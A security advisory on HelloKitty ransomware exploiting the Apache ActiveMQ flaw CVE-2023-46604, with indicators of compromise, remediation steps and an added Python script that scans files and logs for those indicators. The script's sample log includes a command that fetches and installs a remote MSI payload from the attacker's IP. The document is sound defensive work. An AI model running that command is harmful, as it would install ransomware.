

November 2, 2023
Severity
High
Analysis Summary
Security researchers suspect that the HelloKitty ransomware group is exploiting the recently disclosed critical vulnerability in the open-source message broker Apache ActiveMQ, which can result in remote code execution.
The source code of HelloKitty ransomware was leaked on a forum in October, and based on the ransom note, the current activity can be linked to that ransomware family.
“The adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations,” the researchers said in a report.
The vulnerability being exploited is tracked as CVE-2023-46604, a critical remote code execution vulnerability with a CVSS score of 9.4. It affects ActiveMQ versions 5.15.16, 5.16.7, 5.17.6, and 5.18.3.
Proof-of-concept (PoC) exploit code has been publicly available since the bug’s disclosure, and researchers found that the behavior observed in the two reported victim networks appears to be the result of exploitation of CVE-2023-46604.
After successful exploitation, the threat actors attempt to load remote binaries named M2.png and M4.png by way of the Windows Installer. The two MSI files contain a 32-bit .NET executable named dllloader, which loads a Base64-encoded payload named EncDLL. EncDLL behaves like ransomware: it searches for and terminates a specified set of processes before starting encryption, and it appends the “.locked” extension to the encrypted files.

A research group has identified about 3,326 internet-facing ActiveMQ instances that are exposed and vulnerable to CVE-2023-46604. Most of these affected servers are located in China, Germany, the U.S., India, and South Korea.
Because this critical vulnerability is being actively exploited, users are strongly advised to upgrade immediately to a patched version of ActiveMQ and to scan their networks for any indicators of compromise.
Impact
- Code Execution
- Financial Loss
- File Encryption
- Sensitive Data Theft
Indicators of Compromise
IP
- 172.245.16.125
MD5
- 478dcb54e0a610a160a079656b9582de
- c7198ed957a2e21b4a3349e9d2220690
- 26ff72b0b85e764400724e442c164046
SHA-256
- 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
- 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
- c3c0cf25d682e981c7ce1cc0a00fa2b8b46cce2fa49abe38bb412da21da99cb7
SHA-1
- 5ea03fa8326ed87a0c81740092c131f23bc5f651
- 5fc62671aef4b355d2050bf2904c7615cb0795ea
- c789942d013d8b45b6988ecc6491f5f1a1746311
URL
- http://172.245.16.125/m2.png
Remediation
- Upgrade to the latest version of Apache ActiveMQ, available from the Apache website.
- Block all threat indicators at your respective controls.
- Search for the indicators of compromise (IOCs) in your environment using your respective security controls.
- Implement strong email security measures, including spam filters and anti-phishing solutions, to prevent phishing emails that often serve as initial attack vectors for ransomware.
- Keep all software, including operating systems and applications, up to date with the latest security patches and updates to close vulnerabilities that ransomware may exploit.
- Regularly back up critical data and systems, and store backups offline.
- Employ network segmentation to isolate critical systems and limit lateral movement by attackers in case of a breach.
- Deploy strong endpoint security solutions that can detect and respond to malicious activities on devices within the network.
- Implement the principle of least privilege to limit user and system access to only what is necessary for their roles, reducing the impact of a breach.
- Use SIEM solutions to monitor network traffic for unusual or suspicious activities that may indicate a ransomware attack.
- Implement MFA for access to critical systems and accounts to enhance security.
- Develop and regularly test an incident response plan to ensure a coordinated and effective response in case of a ransomware attack.
- Educate users about the risks associated with ransomware, emphasizing the importance of not paying ransoms and reporting incidents promptly.
- Conduct regular vulnerability assessments and penetration testing to identify and address weaknesses in your systems and networks.
- Maintain cyber hygiene by updating your anti-virus software and implementing a patch management lifecycle.
- Emails from unknown senders should always be treated with caution.
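The following script is an added example of the IoC sweep that the analysis (the M2.png/M4.png loader chain and the “.locked” extension) and the remediation item “Search for the indicators of compromise (IOCs) in your environment” call for. It is not code from Rewterz or from the researchers cited in the advisory. The hash, IP and URL values are the ones listed in the advisory; the log lines are constructed samples, and the assumption that a Windows Installer download of the remote MSI shows up in process-creation telemetry as an `msiexec` command line is the author's, not something the advisory states.

```python
"""IoC sweep for the HelloKitty / CVE-2023-46604 activity in the advisory above.

Added example, not part of the original advisory. Indicator values are copied
from the advisory's IoC section; SAMPLE_LOG is a constructed input.
"""
import hashlib
import re

# Indicators copied from the advisory's IoC section (lower-case hex).
IOC_HASHES = {
    "md5": {
        "478dcb54e0a610a160a079656b9582de",
        "c7198ed957a2e21b4a3349e9d2220690",
        "26ff72b0b85e764400724e442c164046",
    },
    "sha1": {
        "5ea03fa8326ed87a0c81740092c131f23bc5f651",
        "5fc62671aef4b355d2050bf2904c7615cb0795ea",
        "c789942d013d8b45b6988ecc6491f5f1a1746311",
    },
    "sha256": {
        "8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4",
        "8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0",
        "c3c0cf25d682e981c7ce1cc0a00fa2b8b46cce2fa49abe38bb412da21da99cb7",
    },
}
IOC_IPS = {"172.245.16.125"}
IOC_URLS = {"http://172.245.16.125/m2.png"}
# Remote file names named in the analysis; matched case-insensitively.
SUSPICIOUS_NAMES = {"m2.png", "m4.png"}
ENCRYPTED_EXT = ".locked"

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def hash_bytes(data):
    """Return md5/sha1/sha256 hex digests of an in-memory byte string."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def hash_file(path):
    """Return md5/sha1/sha256 hex digests of a file, streamed in 64 KiB chunks."""
    digests = {"md5": hashlib.md5(), "sha1": hashlib.sha1(), "sha256": hashlib.sha256()}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            for d in digests.values():
                d.update(chunk)
    return {alg: d.hexdigest() for alg, d in digests.items()}


def match_hashes(digests):
    """Return (algorithm, hash) pairs from `digests` that hit an advisory hash IoC."""
    return [
        (alg, h.lower())
        for alg, h in digests.items()
        if h.lower() in IOC_HASHES.get(alg, set())
    ]


def scan_log_lines(lines):
    """Return (line_number, reasons) for lines that touch the advisory's network IoCs.

    Reasons are 'ip:<addr>' or 'url:<url>' for direct indicator hits, plus the
    assumed 'msiexec-remote-msi' heuristic: a Windows Installer command line that
    references one of the remote file names from the analysis.
    """
    hits = []
    for number, line in enumerate(lines, 1):
        reasons = [f"ip:{ip}" for ip in IP_RE.findall(line) if ip in IOC_IPS]
        reasons += [f"url:{u}" for u in URL_RE.findall(line) if u.lower() in IOC_URLS]
        low = line.lower()
        if "msiexec" in low and any(name in low for name in SUSPICIOUS_NAMES):
            reasons.append("msiexec-remote-msi")
        if reasons:
            hits.append((number, reasons))
    return hits


def find_locked_files(paths):
    """Return the paths carrying the '.locked' extension the encryptor appends."""
    return [p for p in paths if str(p).lower().endswith(ENCRYPTED_EXT)]


# Constructed sample log lines (not from the advisory): a proxy fetch of the
# remote MSI, a Windows Installer launch referencing it, and a benign request.
SAMPLE_LOG = [
    "2023-10-27 14:03:12 proxy allow 10.0.0.12 GET http://172.245.16.125/m2.png 200",
    "2023-10-27 14:03:15 sysmon ProcessCreate msiexec.exe /q /i http://172.245.16.125/M2.png",
    "2023-10-27 14:04:01 proxy allow 10.0.0.12 GET http://example.invalid/index.html 200",
]

if __name__ == "__main__":
    for number, reasons in scan_log_lines(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
    print("locked files:", find_locked_files(["report.docx", "report.docx.locked"]))
```

In a real sweep, feed `hash_file` the paths from a file inventory and `scan_log_lines` the proxy, EDR and Sysmon exports; the network and hash matches are exact indicator hits, while the `msiexec` heuristic and the `.locked` count are weaker signals that should prompt triage rather than be treated as confirmation on their own.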